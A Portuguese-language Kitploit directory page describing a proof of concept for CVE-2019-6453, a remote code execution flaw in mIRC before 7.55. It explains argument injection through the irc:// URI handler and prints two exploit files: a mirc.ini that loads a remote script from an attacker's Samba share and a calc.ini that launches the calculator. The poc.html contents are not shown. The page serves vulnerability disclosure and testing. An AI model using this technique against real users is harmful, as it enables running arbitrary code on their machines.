Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
mIRC-CVE-2019-6453 — Prova de conceito para CVE-2019-6453 | Kitploit
Ferramentas/GitHubGitHub/andripwn/mirc-cve-2019-6453
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubandripwn/mirc-cve-2019-6453

mIRC-CVE-2019-6453

Prova de conceito para CVE-2019-6453

Ver Repositório
11há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-6453: RCE no mIRC <7.55 usando injeção de argumentos através de manipuladores de protocolo URI personalizados

[Link para o artigo]

Encontramos uma vulnerabilidade de Execução Remota de Código no mIRC através do manipulador de protocolo URI irc://. Como o mIRC não usa nenhum tipo de delimitador como -- para marcar o fim da lista de argumentos, um atacante pode passar argumentos para o mIRC através de um link irc:// e executar código arbitrário ao carregar um mirc.ini personalizado de um servidor de arquivos Samba controlado pelo atacante. Observe que ircs:// funciona da mesma forma.

PoC

A prova de cálculo requer três arquivos: mirc.ini, calc.ini e poc.html. Assumimos que um servidor de arquivos Samba está sendo executado no lado do atacante. Para fins de exemplo, os seguintes trechos de código assumem que ele está sendo executado no host 127.0.0.1 (ou seja, substitua 127.0.0.1 pelo endereço do seu próprio servidor nos arquivos a seguir para testar isso).

mirc.ini

mirc.ini é um arquivo de configuração personalizado que deve estar localizado em C:\mirc-poc\mirc.ini no servidor de arquivos.

root@kitploit:~
[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini

calc.ini

Baixar ferramenta

calc.ini é um arquivo de script remoto que deve estar localizado em C:\mirc-poc\calc.ini no servidor de arquivos.

root@kitploit:~
[script]
n0=on *:START: {
n1=  /run calc.exe
n2=}

poc.html

Apenas visitar poc.html deve funcionar, assumindo que o mIRC esteja configurado como manipulador padrão para o esquema URI irc:// e que o navegador não codifique o payload. Dependendo do navegador e da sua configuração, você ainda pode receber um prompt (não é o caso no Firefox).

root@kitploit:~

PoC gif

PoC gif

Versões afetadas

Esta PoC funciona para mIRC <7.55.

Você pode acionar a PoC no Edge 42.17134 (última versão de pré-visualização) e no Firefox 64.0.2 (último lançamento). Não funciona no Chrome devido à forma como o Chrome lida com protocolos URI (a URI é codificada antes de ser passada para o aplicativo).